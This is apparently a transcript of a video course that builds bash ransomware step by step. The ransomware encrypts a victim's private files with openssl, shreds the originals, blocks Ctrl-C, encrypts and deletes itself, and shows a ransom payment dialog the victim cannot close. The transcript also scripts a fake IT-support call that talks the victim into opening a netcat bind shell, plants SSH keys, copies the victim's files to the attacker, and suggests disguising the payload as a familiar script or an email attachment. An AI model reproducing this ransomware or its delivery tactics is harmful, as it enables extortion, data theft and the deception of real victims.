192.168.208.132. Did I get that right? Let me check. This is the IP address for this victim machine here. Oh, sorry. All right, 192.168.208.132. All right. So I got that right. I'm going to connect to it. Connection refused. Let's see. Oh, okay. Remember from the lecture, from the previous lectures, I changed the, how do I call it? The port number for this SSH. So let me quickly do that. All right. So I'm going to comment this. I'm sorry for that. Nope. Okay. Let's make this 22. Okay. I'm going to save this. Now I'm going to restart this. All right. So let's go back to connect. All right. Okay, so now let me perform what we call footprinting or reconnaissance since I've gotten access to the victim machine to see if I can find any sensitive file. Let's see. Nothing serious here. Let's see the into documents. All right, we have a private directory here or folder. Let's see what we got there. Okay, so we have API keys.txt, contract, credit card.txt, diary.txt, password.txt. So let me see. All right. Wow. Bitcoin private key. Wow. More sensitive information is found in this directory. Let me see. Document private directory. Okay. So I think this directory is interesting. What I'm going to do now is to note down the directory where these files reside, which is this directory here, /home/redhound document private. Okay. So what I'm going to do now is I'm going to come back here and then supply the value of that here. So that should be /home/redhound slash document slash private slash. Okay. So now let's cancel or stop the connection. Exit. Let me close this terminal. All right, so now we have the directory containing sensitive files that we want to encrypt. All right, so let me remove that last /. Let's see. Okay, so now I'm going to create a password which this ransomware is going to use to encrypt the files. So let's create something like, I'm going to think of something like let's say you are, okay, 100% modulo screwed for being lazy or lazy. All right. So let me just put lazy 566. Okay. All right. So this is what we this is the password we're going to be making use of to encrypt the files in the user's directory. That is, this ransomware is going to make use of it to encrypt the files in the user directory. All right. So now let's start the encryption. So I'm going to add a comment here. Let's say encryption of files in the directory commences as something like ha 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 ha. Evil laugh. All right. So let's move on. Okay. So now we are going to write the full body of that is what the parts of the basic bash ransomware that will carry out the encryption. So I'm going to make use of bash here. If this is a directory, that is, if this target directory is a directory, then we are going to navigate into the directory. Now what we're going to do is we're going to carry out a loop. So for files, or let me just say files, no, for file in target directory, asterisk. Now this asterisk here stands for all the files in the target directory, that is the files in the victim directory. Let's say that should be private, right? All right, so all these files here, we use what the asterisk to represent them. Okay, so for all the files in this directory, let's encrypt them. So echo encrypting file. We're going to display each file we will be encrypting. Echo what? Encrypting file. All right, then the open SSL command enc. You can see it up here, right? So I'm going to make use of that. Negative, sorry, yeah, cipher. Remember, I removed the dash here, right? When we were creating these constant variables, I removed the dash here, and I told you that we are going to see how to use that in the body of the bash of the basic bash ransomware, right? So now this is what we are doing here. Now we are supplying this dash here. So this simply means AES 256 CBC. All right. Okay. So let's continue. Cipher, then the salt, then the password, which is that password key encrypt. All right. So the next thing we are going to do now is to make use of this password based key. What is it? Derivation function. All right. Then the file, which want to encrypt. That is this file here, which want to encrypt. All right. So then we are going to give it an output, that is, after encrypting the files, this basic bash ransomware is going to give the file a new extension. Let's call this .enc. All right. Okay. So let's see. I think we are good to go. We are good to go. We are good to go. Let me see. All right. But one more thing that you need to understand is this: whenever OpenSSL encrypts a file, it leaves the plain text file around on the directory or in the directory, right? So it's not supposed to be so. When a ransomware encrypts a file, you don't see the plain text again. It encrypts the file and also what deletes the plain text. So if you remember from lecture 5, whenever that is when we were encrypting the file, we saw that this a new file was given the extension .enc, then the password, that is the plain text file, was also present. So we don't want that mistake. So what we need to do is what we are going to make sure that we remove the file, the plain text file, after what encryption. So I'm going to do this, remove file. Then we are going to sleep one. That is, after execution, after encrypting a particular file, this bash ransomware will sleep for 1 second. All right. So I'm going to done, then fi. Okay, let's see. So everything is working properly. Okay, we have this here and this. Okay, All right, so now this is how the basic bash ransomware looks like. Okay, so now we are going to save this. Control X. I'm going to exit. All right. Okay, so since I've done that, now what I'm going to do now is this. I'm going to be transferring this file. I'm going to copy this file or transfer this file to the victim machine and then trick the victim into executing the file. Or even though I don't trick the victim into executing the file, since I have access to the victim file, what I'm going to do is to do what? Is to use my hand to encrypt the files, all right, or to run this basic bash ransomware to encrypt the files. Okay, all right, so what I'm going to do now is this. I'm going to connect again to that. First of all, let me make this executable. All right, okay, so SSH red hound at 192.168.208.132. all right, I'm going to supply the password. Okay, so now, first of all, forgive me for that. Let's copy the file first. So let's transfer the file. SCP basic right base ransomware to Red Hound at 192.168.208.132. Let me copy this to the home directory, which is what? Red Hound. All right. So I'm going to do that. Put in the password. All right. So successfully transferred. Okay. So now it's time to make use of the SSH to connect to gain access to the machine so that I can run the the basic bash ransomware. All right. Now, if you don't want to manually or use your hand to execute or run this basic bash ransomware on the target machine, you can carry out what we call social engineering so that the user can be able to execute the file, like tricking the user to execute the basic bash ransomware. All right, look at our basic bash ransomware here, right? Okay, so now if we navigate into that directory where we have the private directory, see the important files we have here, right? Okay, so now since we are here, you can see that these files are not yet encrypted. They still maintain their plain text nature. We can also display, let's display their contents, all of them. You can see all of them here, right? So they still maintain their nature. All right, so for us now to execute this basic bash ransomware, we are going to run this command basic bash ransomware, right? Coming, let me launch a new instance to where I can be explaining as the basic as the basic bash ransomware is running. Let's call this world. Sorry for that. CD. All right. So nano. Okay. So let's go back to the connection. So I'm going to run this command. Now, while it will be running, I want you to note down something. See from this trap command here, right? We have echo ha ha ha, you are doomed. I explained to you that this trap command is used to trap any Linux signal, any Linux system signal. And now we have here, this is the signal for interrupt int, and then we have exit here, right? This exit here, whenever the basic bash ransomware finishes executing, this exit means when you're exiting, please also display this message, all right? So when the basic bash ransomware finishes executing, it will display ha ha ha, you are doomed. Now for this seek int here, the trap command is going to trap this seek int here. Now you can use the key combination Control C to terminate any Linux process that is running. All right. So that Control C sends what a seek int signal. Now, when this basic bash ransomware will be running, the user might try to stop the execution of this basic bash ransomware. So we need to make use of trap to trap the Control C. The user will be feeding this basic bash ransomware with. Okay, so let's go back to the execution. Now I'm going to run it and test with Control C. You can see it is running. Control C, Control C. It is not stopping. Control C. You can see it's not stopping. So you can see how you are doomed. I also tried it here. You can see Control C. It was trapped by the basic bash ransomware. So now we have it that the files have been encrypted. Let's confirm to see if that is true. Now you can see all the files have been encrypted. Let's try to display their contents, all of them. You can see they are now filled with gibberish, all right? Let's also go to the victim machine or the user machine to see. You see they are now what? Encrypted. Now the user will not be able to retrieve his or her files again. Everything has what? Been encrypted. Okay, so now that the files have been encrypted, the user might try to decrypt the files. Now to do that, the user might try to do a research on his or her Linux system, that is this Linux mint we are using, to see if the basic bash ransomware that encrypted these files could be found, and then retrieve the encryption key for the decryption of these files or for the conversion of these ciphertext back to their plain text. All right. So to do that, the user can navigate to the home directory, use the ls command to display the content. Now, fortunately, the user successfully finds this basic bash ransomware here. Now, very curious, the user might try to display the content of this basic bash or this suspicious bash script to see. Voila! The user finds out that this is the particular ransomware that encrypted his or her files and retrieves this encryption key here so that he or she can use it for what? The decryption of his or her files. Now, this is very poor for our basic bash ransomware. The user is not meant to see the content or the source code of the basic bash ransomware, else he or she will be able to retrieve the encryption key to use for the decryption of the files. So to do that, this basic bash ransomware does not delete itself or removes its source code from the victim machine. So this will be the work or the function of the advanced bash ransomware we will be building in the next video. All right. So this is how the basic bash ransomware works by encrypting users' files. See you in the next video where we are going to be building the advanced ransomware with more features than the basic bash ransomware. Hello and welcome. In this video, we are going to start with the development of the advanced bash-based ransomware. All right. So in the previous video, we developed the basic bash-based ransomware, which had only two features. And number one was that it encrypted the files in the target directory, and also secondly, it removed the plaintext version of those encrypted files. All right. So the features of this advanced bash-based ransomware we are going to build in this video are: number one, encryption of files in the target directory; number two, shredding and removal of the original files, that is the plaintext files, from the target directory. Now, this is just to make it hard for an investigator to recover the plaintext files. The third one is the ransomware will be able to encrypt itself, shreds and remove or delete its original self. Number four here is the user or victim will be unable to close the ransomware payment window. And the last one here, which is a bonus, is a usage of SSH and SCP by the attacker to steal the victim files in the target directory and transfer them to his or her computer via social engineering before executing the ransomware. As it is said, amateurs hack computers while professionals hack people. All right, so let's start building the advanced bash ransomware. So I'm going to start up my terminal. Now, before that, I'm going to create a directory where this advanced bash ransomware will live. Let's call this advanced bash ransomware world. So we are going to be making use of the basic bash ransomware source code or the script. Then we are going to be adding or modifying it to implement this advanced bash ransomware. All right. So let's look for the directory where it lives. We have it here, what? Basic bash ransomware word. So I'm going to copy it from there, basic to our advanced. Now I'm going to rename it directory here. Let's say advanced bash ransomware, right? .sh. Okay, so I'm going to cd into here. Now we have it here as what? Advanced bash ransomware.sh. Now I'm going to use gedit to write the script. Okay, so wait for it to open. Now the first thing I will do here is to change the description here from basic to advanced. Okay, so now we are going to implement feature 2 or feature number 2, where it says shredding and removal of the original files or the plain text files from the target directory. Now this is just to make it hard for an investigator to recover the plain text files. So now to do this, we are going to make use of the shred Linux command. Now the shred Linux command allows you to securely delete a file from your Linux system by overwriting that file multiple times with random values. All right. Now this is done so that the recovery of such data from that file will not be possible. All right. So to do that, we are going to come over here and use the shred command, then the file. All right. Okay, so after shredding the file, we now what? Remove the file. Now, the shred Linux command works like this. When it overrides a file with random numbers or random values multiple times, it doesn't remove that file from your Linux system. Let me show you. Let's say here I have a file. Let's say, let me call this cat hi.txt. Sorry. Let's say cat hi.txt, right? Then I'm going to do something like my password, right? Let's say $401234 $. All right. Okay. So now I want to remove this file and I want to shred it. So 10 times, then hi.txt, right? You can see it didn't remove the file. Now, if you try to display the content of that file, it's what? Nonsense, gibberish. Random values have the shred Linux command has used random values to overwrite the content of this file. All right. So since it doesn't remove that, we make use of what? Remove command to remove the file. All right. So that is what we did here by using this remove command to remove the file. But to save yourself or to make the line of code not to be much long, you can just add a U here. Now this U here is the same thing as what? Remove file. All right. Okay. So after shredding the file, it's going to remove the file automatically. Okay, so the next thing we are going to implement now is the third feature, which says the ransomware will be able to encrypt itself, shreds and remove or delete its original self from the directory or from the users or target directory. Okay, so to do that, I'm going to create a second password here, which is the ransomware we use to encrypt and also delete itself. But the password here will only be used for the encryption, right? Okay. So let's say you can't catch me. Add something like this to make it strong. Line 0 at hash. Don't add nonsense here. All right. Or let me just remove those random values and use something like th quality. All right. Okay. So let's just leave it like that. Then I'm going to add a line here. Then echo. You are doomed again. All right, you are doomed. Now this is where let me add a comment here. This is where the ransomware will encrypt and delete itself. All right. Okay, so let me call this advanced. Okay, so we have here you are doomed. Then now that the ransomware we encrypt and delete itself, we need to cd into the directory. where the ransomware lives. All right, then we are going to come here and encrypt it. I'm going to copy this command again to save some typing. Then I'll come over here, Control V. Let me create some space here, right? So I'm going to create space here also. Okay, so open SSL, Cipher, Salt. Let's call this 2. This is the password the ransomware we use for what? Its encryption. All right. So password, then password key base. Now, this will be the name of the ransomware. We have this as what? Advanced bash ransomware, right? .sh. Now we're going to call this advanced bash ransomware. This is going to be the encrypted version of this advanced bash ransomware. All right. Okay, so since we have it this way, what I'm going to do now is to shred it 10 times. Then we are only going to shred the, how do I call it? The source code, not the encrypted version of this advanced bash ransomware. All right. So after shredding, we don't make use of what this remove here again. Why? Because of this U option we have here. All right, so this is how this ransomware, this advanced ransomware is going to work. It's going to print out you are doomed, then go ahead to navigate into its directory where it exists. Then it's now going to do what? It's now going to encrypt itself and then shred or remove itself. All right. Okay, so let me add something here like bye. Let me remove this. Okay. All right. So one thing I want you to know is this code is not going to run. Why? Because of this. Now let's test that. But before we test it, we're going to test it on our attacker's machine before we move it to the victim machine. All right. So I'm going to clear this. Now I created a text directory here, which I call text files containing the files we are going to test on our hacker or attacker's machine before we move it to the target machine. Sorry, to the target machine. So I have it here. All right. So I'm going to copy the directory here, Control Shift C. Then I'm going to change this to, I'm going to change this. All right. So I'm going to remove this, but I'm not going to do that. I'm going to comment this because we are still going to make use of that. Then I'm going to supply the text file directory here. I'm going to save this. Now let's navigate to our directory for the advanced ransomware. Let's give it the execute permission. All right, so let's run it now. Control C, you see it's not stopping. Oops, we have issue, can't open advanced bash ransomware.sh. Let's see the issue. Okay, from here we have the target directory. All right. Okay, now if you move here, you see cd into target directory. All right, so currently we are now in this directory here for the text file. Now when the ransomware tries to encrypt and delete itself by using this cd dot dot to navigate, it navigated into this text file parent directory, which is home/kali. And since this advanced batch ransomware.sh does not exist in this directory, we got this error here. All right. This is the working directory or the directory where this our advanced ransomware lives. All right. So to do that, before we get to this point where we navigate into the target directory, we need to put up a variable here, abr directory is equals to command substitution pwd. Now, this command substitution allows you to assign the output of a Linux command as a value to a variable or to another Linux command. And that PWD there is what this directory here where our ransomware lives. All right. So that directory will be assigned to this variable here before we get to this point where the directory changes to that of the target directory. All right. So for this ransomware to encrypt and delete itself, we need to change this to its directory. So now it won't matter where the target user installs or runs our advanced ransomware from. So long as this variable exists, even though this bash ransomware exists in the slash home directory or desktop directory or document directory, it will always come back to encrypt and delete itself after encrypting the target files. All right. Okay. So now let's save this and test it again. Encrypting. Let's see. All right, so this was successful. ls We can see now that the ransomware deleted its source code or its source script and then encrypted itself, and it also encrypted the target directory files. You can see it here, right? Now if you notice, we have double encryption here, .enc, because we ran it twice. All right, the first one was when we got that issue, and then the second encryption is just right now that we fixed this source code for the advanced ransomware and we ran it here. All right, so this led to this double encryption. Okay, so now that we are done, it is now time to try to transfer or copy this file, this ransomware, to the target machine or to the target user. All right, so but before that, I'm going to uncomment this and change the directory to reflect the directory on the target user where the sensitive file exists. Okay, now if you notice from the previous video, we created the basic bash ransomware and we made use of SSH to remotely log in and connect to the target machine, right? Now that was possible because we knew the username and the password for the target user or the target machine. But what if you don't know the password and the username for the target machine, right? So this is where you resort to social engineering, where you use tricks or techniques to manipulate the human mind or to manipulate the mind of your target user or victim. Now, the reason you might decide to use social engineering is when you couldn't get the target user's password either through footprinting or any other method. Now, because SSH requires the victim or target user's password to successfully establish a communication channel, social engineering will be ideal for these tasks, as the user will be willingly, like he or she will willingly give out his or her password based on how we social engineer his or her mind. All right. So in this case, our Kali Linux will serve as the hacker machine or the attacker's machine, while the Linux Mint here will serve as the target user, all right, or the target machine. Okay, so I have an image for you here how the conversation will go on between the social engineer and the target user. All right. So we have here, good morning. This is John from IT support. We are conducting a routine security check on all company systems due to a recent increase in cyber threats. May I speak with you for a moment? Then the target user replies, oh, hi John. Sure. What do you need from me? Thank you. We have noticed some unusual activity coming from your workstation. To ensure your data remains secure, I need to run a quick diagnostic. Can you please go to your computer and follow my instructions? Now the target user replies, that sounds serious. What do I need to do? No need to worry. It is a straightforward process. First, could you please open your command prompt? I will guide you through the steps. Okay, I have it open. Great. Now please type in the following command: sudo systemctl start ssh.service and hit the enter key. Next, type the following command: nc-nlvp 4444-e /bin/bash and press enter. This command will allow me to establish a secure bind shell to analyze the traffic and identify any potential threats. Alright, I did that. What's next? Perfect. Now I need your computer's IP address. Type in ifconfig and press enter. This will authenticate the connection using your IP address. Now pass me your IP address. Done. This is my IP address: 192.168.208.132. Excellent. The system will now run the diagnostic. It should only take a few minutes. Meanwhile, please avoid using your computer for anything else to ensure the process runs smoothly. Thank you for your cooperation. All right. So if you notice from the above, from the conversation, the social engineer, that is we establish a bind shell to the target computer using netcat. All right. So now, before I move on to show you, let's talk about the bind shell. Now, in a bind shell, the target machine or the user listens for incoming connections via a certain port, e.g., port 4444. Now, the social engineer or the attacker then has to connect to this port. All right. So in the bind shell, the target user acts as the listener while the social engineer connects to the target machine. All right. Now, in a reverse shell, the social engineer or hacker's computer listens on a network port, e.g., port 444 for incoming connections, and the target user has to connect to the what? To this port. So, in a reverse shell, the social engineer's computer serves as the listener while the target user connect to this social engineer or this hacker's machine. All right. So what we are going to do now is to implement the conversation like what the social engineer told the target user to do. All right. So the first thing the target user was told to do is to make sure they run or start their SSH service. All right. So just see this as the target user trying to run all this command. Okay. So the next thing was for the target user to create a listener on port 4444, right? Then execute this bash. Now, when the attacker or the social engineer successfully connects to this port, which the target user is listening on for incoming connection, the target user machine will render the terminal or the bash or this shell to the attacker's machine. All right. So you can see listening on port 4444. All right. So please, if you notice that your coming, let me show you something. If you notice that this does not work for you, try to install try to do this sudo apt install netcard traditional, right? You can see I already have it running. Then we try to run this sudo sudo, right? Update, alternatives. We have hyphen config nc. All right, then you select number 2, which is what this netcard traditional. You can see I'm already on it here. Then you select number 2. All right, so I'm going to close this window right now. All right, so the reason I just informed you to do that is because most Linux distribution no longer support this for security reasons. All right, so right now that our target user has created this listener on port 444, the hacker can go back. The hacker can now connect to that listening port by making use of what ncnv 192.168.208. Remember, during the conversation, the social engineer or the hacker retrieved or collected the IP address from the target user, right? 132, then port 444. All right. So we're trying to connect to that. Let's see. Open. Okay. Let me see. All right. So we've successfully connected to the to the target machine. You can see connection from our social engineer computer or from the attacker's computer. You can see this is the IP address of my Kali Linux. All right. So from now henceforth, I'm going to make use of Kali Linux, and I'm going to refer to Kali Linux as the social engineer or the hacker, and the Linux Mint as the target user or victim. All right. So make sure you know this when I keep on calling Kali Linux. Sorry, I'm Kali Linux Mint. Kali Linux Mint. All right. Okay. So all right, so since we are here, if you notice, we're not given a nice shell. So to make use of a nice shell, let's make use of this Python command. All right, so import pty.spawn. Let's spawn a shell, the bash shell, right? Okay. Now we have a nice shell here. All right. Okay. So now what we are going to do now is we are going to create what we called a key-based authentication system using SSH. All right. So you can also call this a passwordless authentication mode. All right. So SSH key-based authentication is a secure method of logging into a remote system without a password, which means if I try to SSH into this Linux Mint now, it won't require me to enter a password, just like we have been doing for the basic bash ransomware, where we try to SSH. It requires us to supply the target username and password first. But for this SSH key-based authentication, or we can also call it passwordless authentication, we don't require what a password to be able to log in remotely to the target user. Instead, by using what a public private key pairs, right? So when we use SSH, we will not be asked or prompted to supply a password, but our public private key will be used for the communication. So I repeat again, instead of typing a password, the client, which is the Kali Linux here, will present its private key, which is verified by the server or by the Linux Mint against a public key stored on its system. All right. So what we are going to do now is we are going to create this passwordless based authentication or this key based authentication. So what we are going to do now is to generate this. All right. If you notice something here, we are now present in the Linux Mint machine, right? So now the Linux Mint machine now will be the one to generate this key. We generate this key to use for the key-based authentication mode of SSH, right? And then it will now copy this private key. So it will now copy its public key to the Kali Linux or to the attacker's machine, so that when next this Linux Mint wants to SSH into our Kali Linux, it will not require our Kali Linux password. Instead, it will supply its private key, and that private key will be verified by our Kali Linux against the public key. All right. Okay. So what we're going to do now, just watch me. We're going to run this to generate the keygen t RSA, all right, then B4096, all right, then C here, let's call this passwordless authentication. All right, so let me explain what I just did here. Now, this SSH keygen is the command used to generate, manage, and convert authentication keys for SSH. Then this -t RSA here, the -t option specifies the type of key to create. So we are creating an RSA key pair, right? RSA stands for Reverse Shamer Aduman, all right? Okay, then we have -b here, which specify the number of bits in the key, and here we have 4096 bits, all right? Then we have the comment here, known as passwordless authentication. Okay, so I'm going to hit enter right now. So generating public key pair, enter file in which to save the key. So this is the default directory where the key will be saved. So I'm just going to hit enter. Now created directory /home/reddown.ssh. Now enter passphrase. So I don't want any passphrase here. You can also supply a passphrase if you want. So I'm going to hit enter. So I'm going to hit enter again. All right. So the key has been generated. All right. So the next thing we need to do now is to copy this Linux Mint public key to our Kali Linux computer. All right. So I'm going to use SSH copy ID Kali at 192.168.208. What is our Kali Linux IP address? Let me check that from the Linux Mint. Okay, 128, right? So 128, copy. So are you sure you want to continue? This key is not known by any other names. Yes. Right, so we have here password. So we have to supply the password of the Kali Linux. All right, so I'm going to supply the password. All right, so we have a number of keys added, 1. So now the Linux Mint will be able to SSH into our Kali Linux without Kali Linux prompting it for its password, or SSH prompting it for it to enter the Kali Linux password. All right, because what the Linux Mint will be using is what its private key. So it is going to deliver its private key to Kali Linux, and Kali Linux will be able to compare the public key which we have copied into Kali Linux with the private key supplied by the Linux Mint. So Kali will compare the both of them and then verify that, all right, this user is authentic. Okay, so we've established the passwordless key authentication, all right, or the key-based authentication of SSH. So the next thing we are going to do now is we are going to navigate into the target users directory. All right. Okay, but one thing to note is this: since you have gained access into the target user's computer using social engineering skills, now you can use the Linux command to navigate into the directories present in this target user's machine, so that you can be able to see if you can find any sensitive folder or files that the user has maybe important information stored in. All right. So what we're going to do now is, first of all, we are going to create, if we already we've done our reconnaissance previous in the previous video. So we found out that the user has sensitive files in this directory, private, right? Let's all right, sorry, cd document. All right, sorry, ls cd private ls. All right, so we have here the sensitive files. That is the directory for the sensitive files. All right. So what we are going to do now is we are going to create an archive of these files here, then copy it to our target machine or the Kali Linux machine. All right. So to do that, we are going to make use of the tar command. All right. So what I'm going to do now is we are going to do star create. Let's call the something like target files dot tar, then an asterisk here for all these files here. So I'll hit enter. All right, let's hit ls. Now you can see I've created a tar file here, right? Now one more thing you need to know is this: whenever you create a tar file, it's the size of the tar file is it's always large. We have here 10,240 bytes, so we need to compress this so that we can be able to move it to our target machine or to our Kali Linux. So to compress, we're going to make use of gzip. So I'm going to say target, let's give it the name. Should I give it target files, or let's see? I think target files, yeah. So let's give it target files dot tar. So we're going to compress it. Now let's see, ls. All right. So we now have 2521, 2521. You see that we compressed this target files.tar from 10,240 bytes to what? 2,521 bytes. That means we lost almost 7,000 something bytes. All right. Okay. So since we have compressed it, the next thing we are going to do is to transfer this file to our Kali Linux. All right. So what I'm going to do now, we're going to make use of this SCP here. So the XCP command, which is so this SCP is what secure copy protocol. All right. So we're going to make use of it to transfer the files. That is this file target files.tar.gz, which we compress to our Kali Linux. All right. So we're going to say target files.tar.gz to Kali at 192.168.208.128, right? I'm going to place it in the home directory. Let's call this Kali, or let's just place it in documents directory of Kali. All right. So I'm going to hit enter. All right. So we've successfully transferred it right to our Kali Linux. So the next thing we are going to do now is we are going to transfer our advanced bash ransomware or copy it to this Linux mint. So I'm going to check for the directory again where it exists. So open folder. Okay, right now let's see. We have it in here. We have it here, right? Advanced bash ransomware world. All right, advanced bash ransomware dot encrypt. Nope, that's not supposed to be there. Okay, well, I didn't save this, right? So I'm going to save it. So after saving it, we have it here, right? Advanced bash ransomware. So I'm going to open terminal here to give it the execute permission. All right. So I'm going to do change mode plus X. Sorry. All right. So I'm going to exit. Okay. So now this is directory, right? Wait. Let me take note of that of this directory so that I don't forget the name. All right. So I'm going to do this. Okay. Then ls. All right. So I'm going to minimize this. I'm going to bring it somewhere. Let me move it down here. All right. Then let's open this. Okay. So we're going to copy Kali at 192.168.208.128 home Kali and what? Let me see. Okay, advanced bash ransomware world. All right. Advanced bash ransomware world slash advanced. Let me see. I don't want to make mistake. That's why I'm doing all this. So we have here as what? Advanced bash ransomware world. Then advanced bash ransomware.sh. Advanced bash ransomware.sh. All right. So I'm going to copy it to this Linux Mint machine or to the victim machine. Remember, all these things here are part of the social engineering conversation between the social engineer and the target user. All right. So the target user will be unaware of all these things while we are doing it. Because if you notice during the conversation, we informed the target user not to close the terminal, all right, so that this process will run smoothly. Okay, so I'm going to place it in the target users, let's say slash, let me just call it the present directory or the current working directory. I'm going to hit enter. All right, we have here no such file or directory. Let's see, scp kali at 192.168 advanced bash ransomware world, advanced bash ransomware.sh, scp advanced no such file or directory. Coming, let me check it properly. All right, let's see. Okay, this is advanced bash ransom. Okay, I didn't put an N, ransomware, right? So let me just leave it like that and continue. So what I'm going to do now is, let's try that again. Kali at 192.168.208.128, right? Slash home slash Kali slash advanced ransomware. I think this is how it is, right? Ransomware. Advanced bash okay, ransomware. Oh, that's coming. Let me just change it from here, F2. So ransomware, rename. All right. I'm going to close this. Okay, so I've changed it to advanced ransomware, right? Slash, sorry, advanced bash ransomware. Sorry for that. Let me do it again. Kali at 192.168.208.128 home Kali advanced bash ransomware, advanced bash ransomware.sh, right? So I'm going to copy it to the current directory of this Linux Mint. Same, no such file or directory, ransomware. Is that so? Let's see. Advanced bash ransomware.sh. Open terminal. Let me see again. Right. Okay, so let's see. Home Kali advanced, right? Advanced bash ransomware. Okay, world. Sorry, I didn't give it the world. Right, so let's do that. SCP Kali at 192.168.208.128. Home Kali advanced bash ransomware world advanced bash ransomware.sh. I'm going to put it in the current directory of Linux Mint. Now you can see I got all this error because of spelling mistake or a typo which I did for the folder. I didn't spell the folder correctly, this advanced bash ransomware word. All right, so I corrected it and then we are back to our terminal here. So I'm going to hit enter. All right, so we've successfully transferred our ransomware to this current working directory here. Let's check it. All right, so we now have it here as what? Advanced bash ransomware. Okay, so now take for instance the user has this ransomware elsewhere. Let's say we didn't use social engineering, but we sent an email attachment and the user clicks and downloaded this advanced bash ransomware. Let's say, okay, let's move it to something like, let's copy it to, coming, let me, sorry, let's copy the advanced bash ransomware.sh to something like home, red hand, let's say pictures. All right. Okay, so now let's navigate into pictures. Now we have it here. All right, so I'm going to run this shell script here, this bash ransomware here right now. So sorry for that. I'm coming. Advanced bash ransomware.sh. I'm going to run it. You see, encrypting. There's nothing being displayed to the user here, right? Let me show you. There's nothing being displayed here. You can see. So the user is not aware of our malicious activities. Now we've successfully encrypted the files, right? Now let's run ls. You see, the ransomware has deleted itself. Sorry, it encrypted itself and deleted the source code. All right, so here we have the encrypted version. Okay, so now let's go back to this document private directory to see if the files have been encrypted. You can see here they have all been encrypted. All right, so now if you like, you can also remove this advanced ransomware since we've copied it to the pictures directory. Now you can see that no matter where the user installs or no matter where we install the bash, this advanced ransomware is still going to encrypt itself and delete its source code, you can see. Okay, so one more thing you can do is, for example, if you perform maybe much reconnaissance and notice that the user likes to run a particular script, something like, let's say, systemcheck.sh, maybe constantly on his or her Linux system, what you can do is to rename the advanced bash ransomware.sh to the name of this file or this script the user normally runs. So the user might see it as maybe its normal, like the normal script or shell script it runs regularly on his or her Linux system, right? And just goes ahead to run it without knowing that this is what a file that has been sorry that this is a malicious file. All right. Okay. So that is how to carry out this social engineering by archiving the sensitive file, encrypting the file, and also copying the plain text file or the archive file to your Kali Linux or to your target machine. All right, so this is how to execute it. So I can safely exit right now from this shell. All right, so we have been disconnected. All right, so from here you can now call the user and tell the user, thank you, we fixed everything. All right. Okay, so one more thing I need to show you is this. All right, so since we are here, we have to untar or unzip the file which we copied from the Linux Mint onto our system. That is the file we compressed. All right, so I think we copied it into the documents directory, right? All right, so we have it as target files.tar.gz. So I'm going to make a new directory here. Let's just call this target files. Then I'm going to move these targets. Sorry, I'm going to move these target files. I'm coming. Let me see the name again. Move target files. Sorry for that. .tar.gz into target files, right? Okay, so I'm going to navigate, see it here. So now we are going to untar this. So to do this, we first of all need to use this untar. Sorry, tar xvf. All right. Then we need to give it the name, right? All right. So we now have the sensitive files here. So from here we can be able to read into the files. So let's open this contract, credit card, diary, password.txt. All right, so we have the API keys here of the user, the user's AWS access key. We have this confidential contract, if this thing document. We have the user's credit card details. We also have the user's diary. Then we also have the user's password. Now, all these files were made up by me, right, for this course. So that's the reason if you check here, AWS, I just have something like AKIASSSS, all right? Okay, so that is how this works. So I'm going to close that. Okay, I'm sorry. Let me close them manually. All right, so one more thing I need to show you is this. Now, there is one more feature we need to add, and that feature is, I think that should be feature 4, right? Where we made mention that the user will not be able to close the ransomware window until he or she pays the money, all right, or the ransom. Okay, so the reason I did not show you that when we connected to the Linux Mint machine was because we made use of what social engineering, right? Now, take for instance, just like you sent an email attachment where the user clicked on it and downloaded this advanced ransomware to his or her computer system, right? Now the user will be the one to execute this ransomware, right? This script. Okay. Now let's say, take for instance, the user did not open the ransomware source code like this, the file, to check if this is malicious. Let's say the user just goes on to execute the script, then it's going to display, after encrypting the files, it's going to display a dialog or a message telling the user to pay a certain amount of money. All right. So that should be, yes, that should be 4. The user or victim will be unable to close the ransomware payment window. So to do that, we are going to add something here. That is, should we add it here, or we're going to make use of dialog? I'm thinking of where we should add it. All right. Okay, I'm going to add it here. Yep. So let's add it here. So while true, do, sorry, while true, do dialog title, let's call this payment, right? Let's call this payment. Then yes, label, we're going to create a label here. let's call this pay now. Then the no label, let's call this cancel. All right, then the yes no widget, access to your files is restricted. Please make a payment of let's call this $4,500, right? Please make a payment of $4,500 to regain access to your files. All right, so I'm going to close that, and let's give it width and height of 1050. Okay, so now if we're going to check if the user clicks on pay now, remember, like I explained to you in the dialog video, I told you that dialogues or the widget, they make use of 0 to represent okay or yes or pay now or any positive answer. Then any negative answer like cancel or no, it uses 1. All right, so then now we're going to create a variable here. Amount is equals to dialog title. Let's say amount to pay, right? All right, so this is going to be something like input box, enter amount to pay. All right, then let's give it width and height of 30. All right, then now from this input box here, we see that it's going to, that is when the user clicks on pay now, understand? Like when the user sees that his or her files has been encrypted and this is telling him or her access to your files is restricted, please make a payment of $5 to regain access to your files. If they click on pay now, then this dialog will appear for them to enter the amount to pay. All right. So remember I told you that widget, they use the STD error or the standard error file descriptor to store their output, right? So we need to perform some magic here. Now, instead of us to do something like this, to point it to 1. Now, we are now pointing or redirecting the standard error file descriptor to the standard output descriptor. But this is not going to work. You can test this. This is an assignment. You can test this out. So to make it work, we need a trick. So I'm going to do this. And then, now let me explain to you. Now what I did here is this. I created a new file descriptor and redirected it toward the standard output file descriptor. Now this means 3 now is what our standard output file descriptor. Then we now redirect the standard output file descriptor to the standard error file descriptor. Now 1 here represents what the standard error file descriptor. Now then the 2 here, which is the standard error file descriptor, which widgets use to store their output, we now redirect it to this file descriptor 3. And if you remember from here, file descriptor 3 now points to the standard output file descriptor. All right, so now the value this user will enter will be stored in this variable here. If you are still confused, you can watch the dialog video. All right, I think that should be lecture 5 or lecture 6. Okay, so the only change I made here is what this here, but don't get it confused. This is how it's worked, because like I told you, if you removed all these and use this, it's not going to work. All right, so let me go back. All right, so I'm going to move down here. Now if the user, if this is equal, let's say the user clicks on pay now, right? Clicks on OK, then I'm going to dialog title, let's say processing. All right, then message box, processing payment, right? sorry, processing payment of, let's call this amount. All right, then let's give it width and height of 40. All right, okay, then I end this. Now else continue fi. All right, so if the user pays, then this message will be displayed, processing payment. But if the user refuses to pay, then the user will not be able to exit from this dialog or from this interface. This will continue displaying the interface till the user clicks on pay. All right, so I'm going to add done. I'm going to save this. All right, so could not save this file. All right, so file not found. Let's see, advanced bash ransomware word. I'm going to move, I'm coming, let me exit from here. Okay, right, so let me, sorry, get it, advanced.sh. Let's do that. Let's see. Oops, the changes were not made because of that issue I had. All right, so I'm going to pause this video and fill it in again. All right, so welcome back. I've filled it in, so you can see it here. All right, so let's save this and let's run it again. Let me expand this terminal. All right, let me remove this advanced.inc. So let's run it again. Sorry, this is not going to work because let's make some changes. Remember, 